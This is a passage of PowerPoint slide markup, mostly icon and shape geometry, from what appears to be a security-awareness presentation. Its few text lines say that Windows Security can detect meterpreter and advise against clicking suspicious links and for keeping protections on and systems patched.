                <a:gd name="connsiteX23" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX26" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY26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355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0 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY25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920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367184 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX0" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY0" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX1" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY1" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX2" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY2" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY3" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX4" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY4" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX5" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY5" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX6" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY6" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX7" fmla="*/ 225309 w 225309"/>
                <a:gd name="connsiteY7" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 219909 w 225309"/>
                <a:gd name="connsiteY8" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY9" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY10" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 217171 w 225309"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 211626 w 225309"/>
                <a:gd name="connsiteY12" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY13" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY14" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 0 w 225309"/>
                <a:gd name="connsiteY18" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 54403 w 225309"/>
                <a:gd name="connsiteY20" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 54263 w 225309"/>
                <a:gd name="connsiteY21" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 150786 w 225309"/>
                <a:gd name="connsiteY22" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 193296 w 225309"/>
                <a:gd name="connsiteY23" fmla="*/ 6 h 45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309" h="455920">
                  <a:moveTo>
                    <a:pt x="139383" y="455355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="54403" y="455920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455920"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="193296" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204595" y="73"/>
                    <a:pt x="214144" y="770"/>
                    <a:pt x="225309" y="2823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225271" y="27274"/>
                    <a:pt x="222913" y="50194"/>
                    <a:pt x="219909" y="69600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188141" y="67117"/>
                    <a:pt x="138250" y="66776"/>
                    <a:pt x="139383" y="96177"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139383" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217171" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211626" y="215050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139383" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="455355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="216436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="140898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54403" y="90429"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="54356" y="90266"/>
                    <a:pt x="54310" y="90103"/>
                    <a:pt x="54263" y="89940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54393" y="21715"/>
                    <a:pt x="104084" y="2174"/>
                    <a:pt x="150786" y="971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168948" y="503"/>
                    <a:pt x="181997" y="-60"/>
                    <a:pt x="19329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5435E4-A5D2-465D-AC14-AC1BE0EA5AAA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8105957" y="3478924"/>
              <a:ext cx="284621" cy="282605"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY0" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX1" fmla="*/ 241250 w 299575"/>
                <a:gd name="connsiteY1" fmla="*/ 136266 h 297454"/>
                <a:gd name="connsiteX2" fmla="*/ 229055 w 299575"/>
                <a:gd name="connsiteY2" fmla="*/ 198302 h 297454"/>
                <a:gd name="connsiteX3" fmla="*/ 116648 w 299575"/>
                <a:gd name="connsiteY3" fmla="*/ 234888 h 297454"/>
                <a:gd name="connsiteX4" fmla="*/ 59914 w 299575"/>
                <a:gd name="connsiteY4" fmla="*/ 135736 h 297454"/>
                <a:gd name="connsiteX5" fmla="*/ 58324 w 299575"/>
                <a:gd name="connsiteY5" fmla="*/ 125662 h 297454"/>
                <a:gd name="connsiteX6" fmla="*/ 36585 w 299575"/>
                <a:gd name="connsiteY6" fmla="*/ 125131 h 297454"/>
                <a:gd name="connsiteX7" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY7" fmla="*/ 137857 h 297454"/>
                <a:gd name="connsiteX8" fmla="*/ 31813 w 299575"/>
                <a:gd name="connsiteY8" fmla="*/ 247082 h 297454"/>
                <a:gd name="connsiteX9" fmla="*/ 51961 w 299575"/>
                <a:gd name="connsiteY9" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX10" fmla="*/ 150052 w 299575"/>
                <a:gd name="connsiteY10" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX11" fmla="*/ 250794 w 299575"/>
                <a:gd name="connsiteY11" fmla="*/ 266701 h 297454"/>
                <a:gd name="connsiteX12" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY12" fmla="*/ 250264 h 297454"/>
                <a:gd name="connsiteX13" fmla="*/ 269352 w 299575"/>
                <a:gd name="connsiteY13" fmla="*/ 134675 h 297454"/>
                <a:gd name="connsiteX14" fmla="*/ 261863 w 299575"/>
                <a:gd name="connsiteY14" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX15" fmla="*/ 249204 w 299575"/>
                <a:gd name="connsiteY15" fmla="*/ 123541 h 297454"/>
                <a:gd name="connsiteX16" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY16" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX17" fmla="*/ 89076 w 299575"/>
                <a:gd name="connsiteY17" fmla="*/ 147931 h 297454"/>
                <a:gd name="connsiteX18" fmla="*/ 150582 w 299575"/>
                <a:gd name="connsiteY18" fmla="*/ 208377 h 297454"/>
                <a:gd name="connsiteX19" fmla="*/ 212088 w 299575"/>
                <a:gd name="connsiteY19" fmla="*/ 148461 h 297454"/>
                <a:gd name="connsiteX20" fmla="*/ 151642 w 299575"/>
                <a:gd name="connsiteY20" fmla="*/ 88016 h 297454"/>
                <a:gd name="connsiteX21" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY21" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX22" fmla="*/ 203605 w 299575"/>
                <a:gd name="connsiteY22" fmla="*/ 60444 h 297454"/>
                <a:gd name="connsiteX23" fmla="*/ 235948 w 299575"/>
                <a:gd name="connsiteY23" fmla="*/ 92258 h 297454"/>
                <a:gd name="connsiteX24" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY24" fmla="*/ 59914 h 297454"/>
                <a:gd name="connsiteX25" fmla="*/ 268822 w 299575"/>
                <a:gd name="connsiteY25" fmla="*/ 53552 h 297454"/>
                <a:gd name="connsiteX26" fmla="*/ 245492 w 299575"/>
                <a:gd name="connsiteY26" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX27" fmla="*/ 234357 w 299575"/>
                <a:gd name="connsiteY27" fmla="*/ 29162 h 297454"/>
                <a:gd name="connsiteX28" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY28" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX29" fmla="*/ 258217 w 299575"/>
                <a:gd name="connsiteY29" fmla="*/ 0 h 297454"/>
                <a:gd name="connsiteX30" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY30" fmla="*/ 41887 h 297454"/>
                <a:gd name="connsiteX31" fmla="*/ 299575 w 299575"/>
                <a:gd name="connsiteY31" fmla="*/ 255567 h 297454"/>
                <a:gd name="connsiteX32" fmla="*/ 257687 w 299575"/>
                <a:gd name="connsiteY32" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX33" fmla="*/ 149522 w 299575"/>
                <a:gd name="connsiteY33" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX34" fmla="*/ 41357 w 299575"/>
                <a:gd name="connsiteY34" fmla="*/ 297454 h 297454"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY35" fmla="*/ 256096 h 297454"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 299575"/>
                <a:gd name="connsiteY36" fmla="*/ 41357 h 297454"/>
                <a:gd name="connsiteX37" fmla="*/ 41887 w 299575"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 29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9575" h="297454">
                  <a:moveTo>
                    <a:pt x="249204" y="123541"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="240190" y="123011"/>
                    <a:pt x="239659" y="128843"/>
                    <a:pt x="241250" y="136266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245492" y="158536"/>
                    <a:pt x="240720" y="179214"/>
                    <a:pt x="229055" y="198302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206255" y="234888"/>
                    <a:pt x="158536" y="250264"/>
                    <a:pt x="116648" y="234888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83774" y="222692"/>
                    <a:pt x="50901" y="185577"/>
                    <a:pt x="59914" y="135736"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60444" y="132555"/>
                    <a:pt x="62565" y="127252"/>
                    <a:pt x="58324" y="125662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51431" y="122481"/>
                    <a:pt x="43477" y="123541"/>
                    <a:pt x="36585" y="125131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30222" y="126722"/>
                    <a:pt x="31813" y="133085"/>
                    <a:pt x="31813" y="137857"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="174442"/>
                    <a:pt x="31813" y="210497"/>
                    <a:pt x="31813" y="247082"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31813" y="262989"/>
                    <a:pt x="35524" y="266701"/>
                    <a:pt x="51961" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84835" y="266701"/>
                    <a:pt x="117178" y="266701"/>
                    <a:pt x="150052" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183456" y="266701"/>
                    <a:pt x="217390" y="266701"/>
                    <a:pt x="250794" y="266701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262459" y="266701"/>
                    <a:pt x="269352" y="261929"/>
                    <a:pt x="269352" y="250264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269352" y="211558"/>
                    <a:pt x="269352" y="173382"/>
                    <a:pt x="269352" y="134675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="126987"/>
                    <a:pt x="265773" y="124337"/>
                    <a:pt x="261863" y="123541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257952" y="122746"/>
                    <a:pt x="253180" y="123806"/>
                    <a:pt x="249204" y="123541"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151642" y="88016"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116648" y="87486"/>
                    <a:pt x="89076" y="113997"/>
                    <a:pt x="89076" y="147931"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89076" y="180805"/>
                    <a:pt x="117178" y="208377"/>
                    <a:pt x="150582" y="208377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183986" y="208377"/>
                    <a:pt x="212088" y="181335"/>
                    <a:pt x="212088" y="148461"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212088" y="115058"/>
                    <a:pt x="185577" y="88546"/>
                    <a:pt x="151642" y="88016"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="234357" y="29162"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207846" y="29162"/>
                    <a:pt x="204135" y="32873"/>
                    <a:pt x="203605" y="60444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203605" y="90137"/>
                    <a:pt x="205195" y="92258"/>
                    <a:pt x="235948" y="92258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="267762" y="92258"/>
                    <a:pt x="268822" y="91197"/>
                    <a:pt x="268822" y="59914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="57794"/>
                    <a:pt x="268822" y="55673"/>
                    <a:pt x="268822" y="53552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268822" y="35524"/>
                    <a:pt x="263519" y="29692"/>
                    <a:pt x="245492" y="29162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241781" y="29162"/>
                    <a:pt x="238069" y="29162"/>
                    <a:pt x="234357" y="29162"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="41887" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="113998" y="0"/>
                    <a:pt x="186108" y="0"/>
                    <a:pt x="258217" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284728" y="0"/>
                    <a:pt x="299575" y="14846"/>
                    <a:pt x="299575" y="41887"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="112937"/>
                    <a:pt x="299575" y="184517"/>
                    <a:pt x="299575" y="255567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299575" y="283138"/>
                    <a:pt x="285789" y="297454"/>
                    <a:pt x="257687" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221632" y="297454"/>
                    <a:pt x="185577" y="297454"/>
                    <a:pt x="149522" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113467" y="297454"/>
                    <a:pt x="77412" y="297454"/>
                    <a:pt x="41357" y="297454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14315" y="297454"/>
                    <a:pt x="0" y="283138"/>
                    <a:pt x="0" y="256096"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="184517"/>
                    <a:pt x="0" y="112937"/>
                    <a:pt x="0" y="41357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14315"/>
                    <a:pt x="14846" y="0"/>
                    <a:pt x="4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32D70F0-F5AD-417D-A95D-1EBA385A7C8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831368" y="1220152"/>
            <a:ext cx="6562922" cy="215443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 Windows Security CAN identify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meterpreter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It is the first security layer that provides a reliable protection for your computers.</a:t>
            </a:r>
          </a:p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 DO NOT click on any suspicious links that have unclear behaviors.</a:t>
            </a:r>
          </a:p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 Security layers should always be turned on and patch updates must always be installed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="Graphic 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{136A6F70-EC0E-44A0-92BC-82B2BEB44690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9151902" y="3174330"/>
            <a:ext cx="687792" cy="883022"/>
            <a:chOff x="3425127" y="0"/>
            <a:chExt cx="5341746" cy="68580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99BCC67-341C-42B6-8A43-DD85BF186024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8AFCEAF-F4F5-4EF4-A7E9-9C9498ACDDF2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97606A-71FB-4B0F-8F14-0903161DE588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038230-1B10-40D1-88FC-2BB96F9ABBB2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FCB2FB4-751A-4CF8-AB19-A88C8FA55DA2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63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8192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I, Target Analysis/Reconnaissance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B63942A0-EAF1-4666-AB9E-38EC8880AA40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5520906" y="2521347"/>
            <a:ext cx="6110931" cy="3622550"/>
            <a:chOff x="172557" y="0"/>
            <a:chExt cx="11846886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55EA8C8-370E-4204-A7E2-E92B9AF7BE43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="172457" y="139450"/>
              <a:ext cx="11845539" cy="6720697"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 11845474 w 11845539"/>
                <a:gd name="connsiteY0" fmla="*/ 4808480 h 6720697"/>
                <a:gd name="connsiteX1" fmla="*/ 11412966 w 11845539"/>
                <a:gd name="connsiteY1" fmla="*/ 3555624 h 6720697"/>
                <a:gd name="connsiteX2" fmla="*/ 11052612 w 11845539"/>
                <a:gd name="connsiteY2" fmla="*/ 3227842 h 6720697"/>
                <a:gd name="connsiteX3" fmla="*/ 10983482 w 11845539"/>
                <a:gd name="connsiteY3" fmla="*/ 2860891 h 6720697"/>
                <a:gd name="connsiteX4" fmla="*/ 11253267 w 11845539"/>
                <a:gd name="connsiteY4" fmla="*/ 2254322 h 6720697"/>
                <a:gd name="connsiteX5" fmla="*/ 11399978 w 11845539"/>
                <a:gd name="connsiteY5" fmla="*/ 1813018 h 6720697"/>
                <a:gd name="connsiteX6" fmla="*/ 11199805 w 11845539"/>
                <a:gd name="connsiteY6" fmla="*/ 976590 h 6720697"/>
                <a:gd name="connsiteX7" fmla="*/ 10262087 w 11845539"/>
                <a:gd name="connsiteY7" fmla="*/ 359370 h 6720697"/>
                <a:gd name="connsiteX8" fmla="*/ 8739652 w 11845539"/>
                <a:gd name="connsiteY8" fmla="*/ 2314 h 6720697"/>
                <a:gd name="connsiteX9" fmla="*/ 8738209 w 11845539"/>
                <a:gd name="connsiteY9" fmla="*/ 2314 h 6720697"/>
                <a:gd name="connsiteX10" fmla="*/ 7897039 w 11845539"/>
                <a:gd name="connsiteY10" fmla="*/ 27258 h 6720697"/>
                <a:gd name="connsiteX11" fmla="*/ 6377834 w 11845539"/>
                <a:gd name="connsiteY11" fmla="*/ 382390 h 6720697"/>
                <a:gd name="connsiteX12" fmla="*/ 5338208 w 11845539"/>
                <a:gd name="connsiteY12" fmla="*/ 777515 h 6720697"/>
                <a:gd name="connsiteX13" fmla="*/ 2418679 w 11845539"/>
                <a:gd name="connsiteY13" fmla="*/ 994388 h 6720697"/>
                <a:gd name="connsiteX14" fmla="*/ 1879522 w 11845539"/>
                <a:gd name="connsiteY14" fmla="*/ 962846 h 6720697"/>
                <a:gd name="connsiteX15" fmla="*/ 1336998 w 11845539"/>
                <a:gd name="connsiteY15" fmla="*/ 929793 h 6720697"/>
                <a:gd name="connsiteX16" fmla="*/ 229753 w 11845539"/>
                <a:gd name="connsiteY16" fmla="*/ 1615937 h 6720697"/>
                <a:gd name="connsiteX17" fmla="*/ 202541 w 11845539"/>
                <a:gd name="connsiteY17" fmla="*/ 3924705 h 6720697"/>
                <a:gd name="connsiteX18" fmla="*/ 495690 w 11845539"/>
                <a:gd name="connsiteY18" fmla="*/ 4626242 h 6720697"/>
                <a:gd name="connsiteX19" fmla="*/ 1447770 w 11845539"/>
                <a:gd name="connsiteY19" fmla="*/ 5741113 h 6720697"/>
                <a:gd name="connsiteX20" fmla="*/ 3634978 w 11845539"/>
                <a:gd name="connsiteY20" fmla="*/ 6356066 h 6720697"/>
                <a:gd name="connsiteX21" fmla="*/ 3641780 w 11845539"/>
                <a:gd name="connsiteY21" fmla="*/ 6355310 h 6720697"/>
                <a:gd name="connsiteX22" fmla="*/ 6362098 w 11845539"/>
                <a:gd name="connsiteY22" fmla="*/ 6419286 h 6720697"/>
                <a:gd name="connsiteX23" fmla="*/ 7762147 w 11845539"/>
                <a:gd name="connsiteY23" fmla="*/ 6644267 h 6720697"/>
                <a:gd name="connsiteX24" fmla="*/ 10242571 w 11845539"/>
                <a:gd name="connsiteY24" fmla="*/ 6623445 h 6720697"/>
                <a:gd name="connsiteX25" fmla="*/ 10965685 w 11845539"/>
                <a:gd name="connsiteY25" fmla="*/ 6400182 h 6720697"/>
                <a:gd name="connsiteX26" fmla="*/ 11845474 w 11845539"/>
                <a:gd name="connsiteY26" fmla="*/ 4808480 h 6720697"/>
                <a:gd name="connsiteX27" fmla="*/ 8836131 w 11845539"/>
                <a:gd name="connsiteY27" fmla="*/ 6627774 h 6720697"/>
                <a:gd name="connsiteX28" fmla="*/ 8817647 w 11845539"/>
                <a:gd name="connsiteY28" fmla="*/ 6621452 h 6720697"/>
                <a:gd name="connsiteX29" fmla="*/ 8900039 w 11845539"/>
                <a:gd name="connsiteY29" fmla="*/ 6630798 h 6720697"/>
                <a:gd name="connsiteX30" fmla="*/ 8836131 w 11845539"/>
                <a:gd name="connsiteY30" fmla="*/ 6627774 h 672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845539" h="6720697">
